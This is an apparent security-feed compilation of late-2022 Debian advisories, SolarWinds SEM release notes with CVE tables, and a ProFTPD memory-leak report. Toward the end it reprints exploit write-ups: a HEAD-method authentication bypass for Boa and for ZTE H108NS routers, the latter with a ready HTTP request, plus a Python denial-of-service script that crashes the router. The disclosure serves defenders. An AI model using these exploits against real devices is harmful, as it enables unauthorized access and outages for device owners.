Debian Linux Security Advisory 5289-1 - Multiple security issues were discovered in Chromium, which could result in the execution of arbitrary code.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5289-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffNovember 27, 2022                     https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : chromiumCVE ID         : CVE-2022-4135Multiple security issues were discovered in Chromium, which could resultin the execution of arbitrary code.For the stable distribution (bullseye), this problem has been fixed inversion 107.0.5304.121-1~deb11u1.We recommend that you upgrade your chromium packages.For the detailed security status of chromium please refer toits security tracker page at:https://security-tracker.debian.org/tracker/chromiumFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmOD1k0ACgkQEMKTtsN8TjaWgQ/9HDgOk5kbfuxkGE54PbO+KtS49agkGnRtJ2VrLoEjSxy8kRp+PUDhjVnU7ZhoH8kGy0ElIRgjTZbxevxbdLKdE69N2x0Jao3fXWYt0rUea28Ub+5xL8VaN6CD53M+PwVtJK3xHccW2FQ2erIi2x9HzbDdI0CP+ifRkYlMWdulKVMY9WsLc9hqyfbwV/91WXPw2q/FlrV7hFmztlL4O24Wj18uYVf4OGnFnQencuGHN3I0ry7mZ2d4DKjE0sEjOwF4/kF1rxuZl3QiuOwBqi2P3v96ScrMxyGHolv9m4sEOQRoJsNdZCDrkLEuC6FdfVx4z5v7ICAEtCSdbN9xqv7MKnTv+qnz0s0yaetFPn3z3A+GY1xVr7H9SlJ5D+oazp801Br8t5btxGrEBSzHsGl5MkRaCHbwXaUDS8dm1gwR6LoNjIq6DuUfs6b6ZTFGEBf9Y6/txP3SYiVkTDdVk7xAWD579+ZHY4Js7z6oB0YTBfzSwkfHUsjHJl6+TXBGLnxpJLzGKbG2oskVooFg9Sp0y6Kbwly945Ov5HcGMIFtX46tmfYgSsKbE5p9AcdnFx62kFyZ/PG6MFFXGQSKW6+m4yWLaeBPy5TTI5wGRdqERySvb5x734SoEi6vIVCqAaWNg6cGJcyuoYRRJsNh6DVNIqjYAC39phUYBGLViRAPkA0=PGWE-----END PGP SIGNATURE-----

Debian Security Advisory 5289-1

Debian Linux Security Advisory 5288-1 - It was discovered that a buffer overflow in GraphicsMagick, a collection of image processing tools, could potentially result in the execution of arbitrary code when processing a malformed MIFF image.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5288-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffNovember 25, 2022                     https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : graphicsmagickCVE ID         : CVE-2022-1270It was discovered that a buffer overflow in GraphicsMagick, a collectionof image processing tools, could potentially result in the execution ofarbitrary code when processing a malformed MIFF image.For the stable distribution (bullseye), this problem has been fixed inversion 1.4+really1.3.36+hg16481-2+deb11u1.We recommend that you upgrade your graphicsmagick packages.For the detailed security status of graphicsmagick please refer toits security tracker page at:https://security-tracker.debian.org/tracker/graphicsmagickFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmOBDeAACgkQEMKTtsN8Tjb2nhAApFL4aW7qgs/eQVA2Y9dK8xx70soxNNTuMXWzm6nFEcyetZzk7CfI3ROFi1NquOXCR5/XddrR3uAZduSsNINA7Zk3ZYc/o62+v+DjjNSLbAbBer9gSnAQkCD3QuFfiAmXKH5oOEgjLBz4JKG4g4LMQdM9T5rHasNkywcytRNgnVzo6w6TmqMG1eX+7q0A4w8pJYeMm1AA2OriIqmaF10V++EjzojHFhgmYWW6oMRild8PekCXffH0d7Zmf+AzBQrjz9AcihGPjTzTOHCGrpUQuF/zjOSw2/zwz/1ZdEY+GGmljPRoagoUQxcWcRhVuN3RykY3BbP2/IFFfl2mhoXsKiPO7iZVChejNiGGn2UZ1qxuDYvrdu3ihlDU6KjZOMznJ7H8OwD7fe8icrkY0L5P6DMu4GHveLx/3alGdHEQcTQggYsCPVSL4kcZTiAMrkp8W4gU+wZqmA0R4WksDS3a1cVJtEK4IdfS1YR/lJWgWkMRyr2U2Ig41rp+4GweURRmFt/jCkizSx+eD/FuspFS7VjYQO2ks3JFveYa4386jzBPMXZY+su2sCaaEU6eNIWD/2K0fh2G/XEiO9/PAoU8JLP9sDdy/lCurtovMi7XgI5EXCcCxHiadVjR0uyRjF8hKrsI/Lsm+Js3NcoocRe4RJp4MBi1T2ThMo47YvJRY8g=ZQpC-----END PGP SIGNATURE-----

Debian Security Advisory 5288-1

This vulnerability occurs when a web server fails to correctly process the Content-Length of POST requests. This can lead to HTTP request smuggling or XSS.

Release Date: November 22, 2022

This document summarizes new features, improvements, and fixed issues in Security Event Manager (SEM) 2022.4, additional features, and upgrade notes and workarounds for known issues.

**New in SEM 2022.4****Added features and improvements**

*   **Import and Export of Rules**
    
    Administrators can export rules from SEM to a JSON file, and all users can import rules on the Configure > Rules page.
    
*   **Export nodes**
    
    All or selected node information can be exported as a CSV file on the Configure > Nodes page.
    
*   **Improved Saved and Schedule Query options**
    
    The Save and Schedule options are now consolidated under one menu.
    
*   **Query Tags and Thresholds**
    
    SEM 2022.4 introduces query tags and thresholds. These are used to group queries and determine the severity level and colors for two new dashboard widgets: Scheduled query severity, and Scheduled query table severity.
    
    To set the tags and thresholds for a query:
    
    1.  Select the required query in the left column of Historical Events.
    2.  Click Option and select Edit saved query.
    3.  Click Add tag. Queries can be assigned one or more tags.
    4.  Select the Thresholds tab. At least one tags must be added before you can set thresholds.
    5.  Set the number of results per evaluation you want to indicate warning and critical severity.
    
    For more information about tags, thresholds and the scheduled event severity dashboard widgets, see Historical Events section of the SEM 2022.4 Administrator Guide.
    

*   **HTTPS is permanently enabled**
    
    The togglehttp command has been removed from the CMC manager options. If HTTP has been enabled prior to upgrading to 2022.4 it will be disabled.
    
*   **Improved Remote Agent Installer credentials dialog**

For system requirements, see SEM 2022.4 System Requirements.

If you are looking for previous release notes for SEM, see Previous Version documentation.

**New customer installation**

For information about installing SEM, see the SEM Installation Guide and the SEM Getting Started Guide.

SolarWinds advises that, as a best practice, the SEM appliance should not be set up to be available to the Internet or any public-facing network. In addition, using this practice will help prevent access by unauthorized users. For further information on SEM security, see the SEM security checklists.

**Before you upgrade****Migrate LDAP connectors (introduced in SEM 2020.4)**

It is recommended that users remove any ambiguity in their Directory Service Tool connector configurations to allow migration to run as smoothly as possible. This can be by ensuring only one Directory Service Tool connector configuration is set up per domain.

All Directory Service Tool connectors are removed in process of the migration.

**Upgrade agents**

For AIX, HPUX and Solaris, agents installers now only contain custom Java; this means customers need to install Java themselves as a prerequisite.

1.  Upgrade Java installation to the latest version. See System Requirements for supported versions.
    
    For AIX agents, see Known Issues - AIX agent not connected after SEM upgrade.
    
2.  Upgrade SEM agents using latest custom Java installer.

**Upgrade Manager appliance**

For Windows systems, upgrade the Manager appliance with OpenJDK 17.0.3 or later.

**How to upgrade**

If you are upgrading from a previous version, use the following resources to plan and implement your upgrade.

SEM  must be upgraded to 2020.2 or 2020.2.1 before upgrading to 2022.4. To upgrade from earlier versions, see the SEM Upgrade Path to help you plan and execute your upgrade.

Download the upgrade package from the SolarWinds Customer Portal.

**CMC**

Since SEM 2020.4, a password is required to access the CMC command-line interface. The default CMC password is password. See Change the SEM CMC password for instructions on changing this.

**File system consistency check (fsck)**

During your upgrade, the system may run a fsck check during reboot. This can last 30 or more minutes depending on the quantity of data in the data partition. With the Debian version upgrade, the file system is configured to initiate the check when certain conditions are met:

*   21 mounts since the last check (during the 22nd reboot)

Or:

*   Six months since the last check

**Supported connectors**

The list of currently supported connectors can be found here.

**Fixed issues**

SEM 2022.4 fixes the following issues:

 

Case Number

Description

01119251

Remote agent installation does not display credentials.

01087657, 01077235, 01098824

OpenJDK issue resolved.

01066283, 0106346

Windows agent issue after update resolved.

00686391, 00976672, 0721268

Issue fixed where agent was not sending logs.

00997061, 00815612, 00929072, 00667624, 00823710, 01083879

Issue where alert fired multiple times in specified timeframe instead of once resolved

**SolarWinds CVEs**

    

CVE-ID

Vulnerability Title

Description

Severity

Credit

CVE-2022-38113

Information Disclosure Vulnerability

This vulnerability discloses build and services versions in the server response header.

Low

 

CVE-2022-38114

Client Side Desync Vulnerability

This vulnerability occurs when a web server fails to correctly process the Content-Length of POST requests. This can lead to HTTP request smuggling or XSS.

Low

Ken Pyle CYBIR

CVE-2022-38115

Insecure Methods Vulnerability

Insecure method vulnerability in which , allowed HTTP methods are disclosed e.g., OPTIONS, DELETE, TRACE, and PUT

Low

 

SolarWinds would like to thank our Security Researchers for reporting on these issuse in a responsible manner and working with our security, product, and engineering teams to fix the vulnerabilities.

**Third Party CVEs**

   

CVE-ID

Vulnerability Title

Description

Severity

CVE-2009-2409

SHA-1 Collision Vulnerability

The Network Security Services (NSS) library before 3.12.3, as used in Firefox; GnuTLS before 2.6.4 and 2.7.4; OpenSSL 0.9.8 through 0.9.8k; and other products support MD2 with X.509 certificates, which might allow remote attackers to spoof certificates by using MD2 design flaws to generate a hash collision in less than brute-force time.

The scope of this issue is currently limited because the amount of computation required is still large.

Medium

**Known issues**

In SEM Reports, problems occur setting schedule times in Spanish format

**Issue:** When the Spanish format has been selected in SEM Reports, user is unable to specify whether schedule times are AM or PM.

**Resolution/Workaround:** Set Format to English (World) when specifying schedule times.

USB Defender service stops working after local policy USB detached

**Issue:** When USB Defender with Local policy is set up. A USB device that is not on Local policy whitelist is inserted and successfully disconnect by USB Defender. However, when reinserted and successfully ejected once or more than ten times the service fails.

**Resolution/Workaround:** None.

\[Rules builder\] \[Email templates\] - Not possible to select Event Data in Email action for rule with single condition and occurrence settings

**Issue:** After selecting Send Email Message in a single condition event rule, and selecting an email template, you cannot select Event Data as value for the parameter.

**Resolution/Workaround:** The rule must be triggered by one event only.

*   **Unable to install MacOS agent on BigSur**

**Issue:** Unable to install the MacOS agent on BigSur.

**Resolution/Workaround:** Execute/start the customJava installer, kill it, and then execute the agent installer with bundled java.

*   **"Set time when a rule won't trigger actions after rule was true" not working**

**Issue:** "Set time when a rule won't trigger actions after rule was true" functionality in rules does not work.

**Resolution/Workaround:** None.

   

Version

EOL

Announcements

EOE Effective

dates

EOL Effective dates

6.7

**May 18, 2021:** End-of-Life (EoL) announcement – Customers on SEM versions 6.7, 6.7.1, and 6.7.2 should begin transitioning to the latest version of SEM.

**August 18, 2021:** End-of-Engineering (EoE) – Service releases, bug fixes, workarounds, and service packs for SEM versions 6.7, 6.7.1, and 6.7.2 will no longer be actively supported by SolarWinds.

**August 18, 2022:** End-of-Life (EoL) – SolarWinds will no longer provide technical support for SEM version versions 6.7, 6.7.1, and 6.7.2.

2019.4

**April 19, 2022:** End-of-Life (EoL) announcement – Customers on SEM versions 2019.4, and 2019.4.1 should begin transitioning to the latest version of SEM.

**October 19, 2022:** End-of-Engineering (EoE) – Service releases, bug fixes, workarounds, and service packs for SEM versions 2019.4, and 2019.4.1 will no longer be actively supported by SolarWinds.

**October 19, 2023:** End-of-Life (EoL) – SolarWinds will no longer provide technical support for SEM version versions 2019.4, and 2019.4.1.

2020.2

**April 19, 2021:** End-of-Life (EoL) announcement – Customers on SEM versions 2020.2, 2020.2.1 and 2020.2.2 should begin transitioning to the latest version of SEM.

**October 19, 2022:** End-of-Engineering (EoE) – Service releases, bug fixes, workarounds, and service packs for SEM versions 2020.2, 2020.2.1 and 2020.2.2 will no longer be actively supported by SolarWinds.

**October 19, 2023:** End-of-Life (EoL) – SolarWinds will no longer provide technical support for SEM version versions 2020.2, 2020.2.1 and 2020.2.2.

2020.4

**April 19, 2021:** End-of-Life (EoL) announcement – Customers on SEM versions 2020.4, and 2020.4.1 should begin transitioning to the latest version of SEM.

**October 19, 2022:** End-of-Engineering (EoE) – Service releases, bug fixes, workarounds, and service packs for SEM versions 2020.4, and 2020.4.1 will no longer be actively supported by SolarWinds.

**October 19, 2023:** End-of-Life (EoL) – SolarWinds will no longer provide technical support for SEM version versions 2020.4, and 2020.4.1.

**Legal notices**

© 2022 SolarWinds Worldwide, LLC. All rights reserved.

This document may not be reproduced by any means nor modified, decompiled, disassembled, published or distributed, in whole or in part, or translated to any electronic medium or other means without the prior written consent of SolarWinds. All right, title, and interest in and to the software, services, and documentation are and shall remain the exclusive property of SolarWinds, its affiliates, and/or its respective licensors.

SOLARWINDS DISCLAIMS ALL WARRANTIES, CONDITIONS, OR OTHER TERMS, EXPRESS OR IMPLIED, STATUTORY OR OTHERWISE, ON THE DOCUMENTATION, INCLUDING WITHOUT LIMITATION NONINFRINGEMENT, ACCURACY, COMPLETENESS, OR USEFULNESS OF ANY INFORMATION CONTAINED HEREIN. IN NO EVENT SHALL SOLARWINDS, ITS SUPPLIERS, NOR ITS LICENSORS BE LIABLE FOR ANY DAMAGES, WHETHER ARISING IN TORT, CONTRACT OR ANY OTHER LEGAL THEORY, EVEN IF SOLARWINDS HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES.

The SolarWinds, SolarWinds & Design, Orion, and THWACK trademarks are the exclusive property of SolarWinds Worldwide, LLC or its affiliates, are registered with the U.S. Patent and Trademark Office, and may be registered or pending registration in other countries. All other SolarWinds trademarks, service marks, and logos may be common law marks or are registered or pending registration. All other trademarks mentioned herein are used for identification purposes only and are trademarks of (and may be registered trademarks) of their respective companies.

CVE-2022-38114: SEM 2022.4 Release Notes

Debian Linux Security Advisory 5287-1 - Several vulnerabilities were discovered in Heimdal, an implementation of Kerberos 5 that aims to be compatible with MIT Kerberos.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5287-1                   security@debian.org  
https://www.debian.org/security/                     Salvatore Bonaccorso  
November 22, 2022                     https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : heimdal  
CVE ID         : CVE-2021-3671 CVE-2021-44758 CVE-2022-3437 CVE-2022-41916  
                 CVE-2022-42898 CVE-2022-44640  
Debian Bug     : 996586

Several vulnerabilities were discovered in Heimdal, an implementation of  
Kerberos 5 that aims to be compatible with MIT Kerberos.

CVE-2021-3671

    Joseph Sutton discovered that the Heimdal KDC does not validate that  
    the server name in the TGS-REQ is present before dereferencing,  
    which may result in denial of service.

CVE-2021-44758

    It was discovered that Heimdal is prone to a NULL dereference in  
    acceptors where an initial SPNEGO token that has no acceptable  
    mechanisms, which may result in denial of service for a server  
    application that uses SPNEGO.

CVE-2022-3437

    Several buffer overflow flaws and non-constant time leaks were  
    discovered when using 1DES, 3DES or RC4 (arcfour).

CVE-2022-41916

    An out-of-bounds memory access was discovered when Heimdal  
    normalizes Unicode, which may result in denial of service.

CVE-2022-42898

    It was discovered that integer overflows in PAC parsing may result  
    in denial of service for Heimdal KDCs or possibly Heimdal servers.

CVE-2022-44640

    It was discovered that the Heimdal's ASN.1 compiler generates code  
    that allows specially crafted DER encodings to invoke an invalid  
    free on the decoded structure upon decode error, which may result in  
    remote code execution in the Heimdal KDC.

For the stable distribution (bullseye), these problems have been fixed in  
version 7.7.0+dfsg-2+deb11u2.

We recommend that you upgrade your heimdal packages.

For the detailed security status of heimdal please refer to its security  
tracker page at:  
https://security-tracker.debian.org/tracker/heimdal

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAmN9JvNfFIAAAAAALgAo  
aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2  
NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xND  
z0Soow//ePJ2Ls8Zoz3IZebkzebVDGYdofReuaVNOxb4yWBVAMi5B2LDYAdsusPJ  
mih1urmiVUEAoHlCXUUM57dx+Mm+HGOoNcI3ancDuFZIXv3PKGaJK9Tj1QRztZcg  
dgpWLTxTZKd62xEFsNcuaU4JMQ0dI8WXZHNEM4P7sqwcfBJyaZycoa3lJr0CUZp9  
k68IwLEkzX0wgbiYub3himSkCdzMWOAnBuIFGQa6kbnvuwyM04wLi4es8uKTyF5j  
HFHrbf7eK2bxwizgimMCuM0DfTdaYUbgbLPSRh2P71grJty9EmO3GNaWDryYLXVf  
oO1klPk5hwmCHZJC3xAX1XATn+bM1ESF2diK95SXE8BmrhFgb4tWQaHWidszVkYO  
DOo6w+WCvdlHURTg8Az/f2KJWObp6W6+x27owxU38mddagYb0Vepu3dk90IoYzKP  
4fy+wQ0eSBqlkBnvTlBjybwK6Jko3EibpusZoNaiJKRof5dTCLd+43GIaAPirU6u  
yV8x0tZR9ED18altczvzTT0hYFaF2Z4/0vhn4KB2OCCax6ii61GJzIIbkeGm+Blk  
ZghclzIzHfKBukBBaRSIB+OhO/1rvC7aKRHq24qx7eakUSL/jN7P/V2G56X+Ij4+  
ssK/ffgb6NQw6nXu8364mt+qTqbDN0kQ/7nJbpk3tkpJXLEJf1oÝFe  
-----END PGP SIGNATURE-----

Debian Security Advisory 5287-1

mod_radius in ProFTPD before 1.3.7c allows memory disclosure to RADIUS servers because it copies blocks of 16 characters.

**What I Did**

We have noticed a disclosure of memory contents from mod\_radius to RADIUS servers.

mod\_radius copies the client-supplied password into a temporary  
buffer to encrypt it with the RADIUS shared secret. However, it  
does so obeying some padding rules: i.e. it is expected that the  
password has a length multiple of 16.

If the password length is _not_ an exact multiple, mod\_radius still  
copies the "rounded up" count of bytes from the password buffer into  
the temporary buffer, thereby leaking whatever happens to occur past  
the actual password. For FTP session, this often seems to be a copy  
of the password, preceded by some 0 bytes, and tailed by some  
garbage. We have not evaluated if SFTP sessions may leak other  
secrets.

This can be reproduced very well with very short passwords. From a  
FreeRADIUS radiusd debug log, you can observe the duplication of the  
password "12345" here:

(0) Received Access-Request Id 94 from 10.12.16.61:24712 to 10.12.16.26:1812 length 133  
(0) User-Name = "test@realm.ch"  
(0) User-Password = "012345\\000\\000012345\\000d"  
(0) NAS-Identifier = "ftp"  
(0) NAS-IP-Address = 10.12.16.61  
(0) NAS-Port = 21  
(0) NAS-Port-Type = Virtual

**What I Expected/Wanted**

proftpd should send _just_ the user password, and nothing else.

**ProFTPD Version and Configuration**

I've specifically tested this with 1.3.3c (from source), 1.3.6-4+deb10u5 (from Debian) and git cba3a1a.

CVE-2021-46854: mod_radius: memory disclosure to radius server · Issue #1284 · proftpd/proftpd

Debian Linux Security Advisory 5286-1 - Greg Hudson discovered integer overflow flaws in the PAC parsing in krb5, the MIT implementation of Kerberos, which may result in remote code execution (in a KDC, kadmin, or GSS or Kerberos application server process), information exposure (to a cross-realm KDC acting maliciously), or denial of service (KDC or kadmind process crash).

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5286-1                   security@debian.orghttps://www.debian.org/security/                     Salvatore BonaccorsoNovember 19, 2022                     https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : krb5CVE ID         : CVE-2022-42898Debian Bug     : 1024267Greg Hudson discovered integer overflow flaws in the PAC parsing inkrb5, the MIT implementation of Kerberos, which may result in remotecode execution (in a KDC, kadmin, or GSS or Kerberos application serverprocess), information exposure (to a cross-realm KDC actingmaliciously), or denial of service (KDC or kadmind process crash).For the stable distribution (bullseye), this problem has been fixed inversion 1.18.3-6+deb11u3.We recommend that you upgrade your krb5 packages.For the detailed security status of krb5 please refer to its securitytracker page at:https://security-tracker.debian.org/tracker/krb5Further information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAmN42JdfFIAAAAAALgAoaXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xNDz0Ts8Q//XhOs3bCQ+xCaIy0cXiNxk4JwzjvBuBdWb5gdmavqO/yS31IfaM3s7WlVA6Y9g00qGjhtPyHbDTTu68gYQv5EuoVFZjYA3M51vdM+PxRN6po0QMvANAHhp1owGbFkEflZblMqPHMsMuDt3C6D2hr+5aCOyNY4V20BJuLOkoKa8RBtxKo0Lcq1j5V2PjLgX+dEvaz6ORpBGdNENmZFAwgllB1pXMoobLLJWLsaEvUrl6pQhwXRs+s5LHKrhAvhHnacShPNVgHq6uJ5s0PGsXlf/BeN2hWzQzgj16My+x3VbVc6TCHv5sD5L615DiwXwC4sNIl1KYYd04Fnyi87Tpnp7fowyfgluPYLUAGX7srilCpmb8XBKeUHwlxGLWTYvlECryucUOWFMph6K/aHTIIItraqeFCQsGDcPa5x//LsF4RcfPt49u6jcig9e6koCej6+DrBIvf8vDUyyDB8V4kk2jN4pzeTjpMiKAY8WBnBxQwfGGCGAu3FEoOkijtxbLje+1DsgKivwEiakgg6rcabQ6yZmuK0Aspi/kw8U55ecr7lntBM03nfb8yrnfgDGWEaRkAAhEft80ajaC7Ym1tveDaq8FAiA4uk07FgOVF+iO3XX77zwrVuh2SPlsaeTC7AnRYIfqy6emRHLAVG9SJP+WMSiggi1SOEQaL1AN5YirQ=dMbH-----END PGP SIGNATURE-----

Debian Security Advisory 5286-1

Boa Web Server versions 0.94.13 through 0.94.14 fail to validate the correct security constraint on the HEAD HTTP method allowing everyone to bypass the Basic Authorization mechanism.

    # Exploit Title: Boa Web Server 0.94.13-0.94.14 Authentication Bypass# Date: 19-11-2022# Exploit Author: George Tsimpidas # Vendor: https://github.com/gpg/boa# CVE: N/A # Tested on: Debian 5.18.5Description :Boa Web Server Versions from 0.94.13 - 0.94.14 fail to validate thecorrect security constraint on the HEAD http method allowing everyoneto bypass the Basic Authorization Mechanism.Culprit :if (!memcmp(req->logline, "GET ", 4))req->method = M_GET;else if (!memcmp(req->logline, "HEAD ", 5))/* head is just get w/no body */req->method = M_HEAD;else if (!memcmp(req->logline, "POST ", 5))req->method = M_POST;else {log_error_doc(req);fprintf(stderr, "malformed request: \"%s\"\n", req->logline);send_r_not_implemented(req);return 0;}The req->method = M_HEAD; is being parsed directly  on the  response.cfile, looking at how the method is being implemented for one of theresponse codes :/* R_NOT_IMP: 505 */void send_r_bad_version(request * req){    SQUASH_KA(req);    req->response_status = R_BAD_VERSION;    if (!req->simple) {        req_write(req, "HTTP/1.0 505 HTTP Version Not Supported\r\n");        print_http_headers(req);        req_write(req, "Content-Type: " HTML "\r\n\r\n"); /* terminateheader */    }    if (req->method != M_HEAD) {        req_write(req,                  "<HTML><HEAD><TITLE>505 HTTP Version NotSupported</TITLE></HEAD>\n"                  "<BODY><H1>505 HTTP Version Not Supported</H1>\nHTTPversions "                  "other than 0.9 and 1.0 "                  "are not supported in Boa.\n<p><p>Version encountered: ");        req_write(req, req->http_version);        req_write(req, "<p><p></BODY></HTML>\n");    }    req_flush(req);}Above code condition indicates that if (req->method != M_HEAD)  thereforeif the the requested method does not equal to M_HEAD thenreq_write(req,                  "<HTML><HEAD><TITLE>505 HTTP Version NotSupported</TITLE></HEAD>\n"                  "<BODY><H1>505 HTTP Version Not Supported</H1>\nHTTPversions "                  "other than 0.9 and 1.0 "                  "are not supported in Boa.\n<p><p>Version encountered: ");        req_write(req, req->http_version);        req_write(req, "<p><p></BODY></HTML>\n");    }So if the method actually contains the http method of HEAD it's beingpassed  for every function that includes all the response code methods.

Boa Web Server 0.94.13 / 0.94.14 Authentication Bypass

ZTE ZXHN-H108NS router with firmware version H108NSV1.0.7u_ZRD_GR2_A68 suffers from an authentication bypass vulnerability when alternate HTTP methods are leveraged.

    # Exploit Title: Router ZTE-H108NS - Authentication Bypass# Date: 19-11-2022# Exploit Author: George Tsimpidas # Vendor: https://www.zte.com.cn/global/# Firmware: H108NSV1.0.7u_ZRD_GR2_A68# CVE: N/A # Tested on: Debian 5.18.5Description :When specific http methods are listed within a security constraint,then only thosemethods are protected. Router ZTE-H108NS defines the following httpmethods: GET, POST, and HEAD. HEAD method seems to fall under a flawedoperation which allows the HEAD to be implemented correctly with everyResponse Status Code.Proof Of Concept :Below request bypasses successfully the Basic Authentication, andgrants access to the Administration Panel of the Router.HEAD /cgi-bin/tools_admin.asp  HTTP/1.1Host: 192.168.1.1User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateDNT: 1Connection: closeCookie: SESSIONID=1cd6bb77Upgrade-Insecure-Requests: 1Cache-Control: max-age=0

ZTE ZXHN-H108NS Authentication Bypass

ZTE ZXHN-H108NS router with firmware version H108NSV1.0.7u_ZRD_GR2_A68 remote stack buffer overflow exploit that causes a denial of service condition.

    # Exploit Title: Router ZTE-H108NS - Stack Buffer Overflow (DoS)# Date: 19-11-2022# Exploit Author: George Tsimpidas # Vendor: https://www.zte.com.cn/global/# Firmware: H108NSV1.0.7u_ZRD_GR2_A68# Usage: python zte-exploit.py <victim-ip> <port># CVE: N/A # Tested on: Debian 5.18.5#!/usr/bin/python3import sysimport socketfrom time import sleephost = sys.argv[1]  # Recieve IP from userport = int(sys.argv[2])  # Recieve Port from userjunk = b"1500Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae"* 5buffer = b"GET /cgi-bin/tools_test.asp?testFlag=1&Test_PVC=0&pingtest_type=Yes&IP=192.168.1.1"+ junk + b"&TestBtn=START HTTP/1.1\r\n"buffer += b"Host: 192.168.1.1\r\n"buffer += b"User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0)Gecko/20100101 Firefox/91.0\r\n"buffer += b"Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\n"buffer += b"Accept-Language: en-US,en;q=0.5\r\n"buffer += b"Accept-Encoding: gzip, deflate\r\n"buffer += b"Authorization: Basic YWRtaW46YWRtaW4=\r\n"buffer += b"Connection: Keep-Alive\r\n"buffer += b"Cookie:SID=21caea85fe39c09297a2b6ad4f286752fe47e6c9c5f601c23b58432db13298f2;_TESTCOOKIESUPPORT=1; SESSIONID=53483d25\r\n"buffer += b"Upgrade-Insecure-Requests: 1\r\n\r\n"print("[*] Sending evil payload...")s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)s.connect((host, port))s.send(buffer)sleep(1)s.close()print("[+] Crashing boom boom ~ check if target is down ;)")

ZTE ZXHN-H108NS Stack Buffer Overflow / Denial Of Service

Debian Linux Security Advisory 5285-1 - Multiple security vulnerabilities have been found in Asterisk, an Open Source Private Branch Exchange. Buffer overflows and other programming errors could be exploited for information disclosure or the execution of arbitrary code.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5285-1                   security@debian.org  
https://www.debian.org/security/                          Markus Koschany  
November 17, 2022                     https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : asterisk  
CVE ID         : CVE-2021-37706 CVE-2021-43299 CVE-2021-43300 CVE-2021-43301  
                 CVE-2021-43302 CVE-2021-43303 CVE-2021-43804 CVE-2021-43845  
                 CVE-2021-46837 CVE-2022-21722 CVE-2022-21723 CVE-2022-23608  
                 CVE-2022-24763 CVE-2022-24764 CVE-2022-24786 CVE-2022-24792  
                 CVE-2022-24793 CVE-2022-26498 CVE-2022-26499 CVE-2022-26651  
Debian Bug     : 1014998 1018073 1014976

Multiple security vulnerabilities have been found in Asterisk, an Open Source  
Private Branch Exchange. Buffer overflows and other programming errors could be  
exploited for information disclosure or the execution of arbitrary code.

Special care should be taken when upgrading to this new upstream release.  
Some configuration files and options have changed in order to remedy  
certain security vulnerabilities. Most notably the pjsip TLS listener only  
accepts TLSv1.3 connections in the default configuration now. This can be  
reverted by adding method=tlsv1_2 to the transport in pjsip.conf. See also  
https://issues.asterisk.org/jira/browse/ASTERISK-29017.

For the stable distribution (bullseye), these problems have been fixed in  
version 1:16.28.0~dfsg-0+deb11u1.

We recommend that you upgrade your asterisk packages.

For the detailed security status of asterisk please refer to  
its security tracker page at:  
https://security-tracker.debian.org/tracker/asterisk

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQKTBAEBCgB9FiEErPPQiO8y7e9qGoNf2a0UuVE7UeQFAmN2qoFfFIAAAAAALgAo  
aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldEFD  
RjNEMDg4RUYzMkVERUY2QTFBODM1RkQ5QUQxNEI5NTEzQjUxRTQACgkQ2a0UuVE7  
UeR0pQ/+Kr+FWFeFyrkFTyVv5BGBJug+EvZzzC2JZoI/TNsiAWQi/BZTQJ0pmdZr  
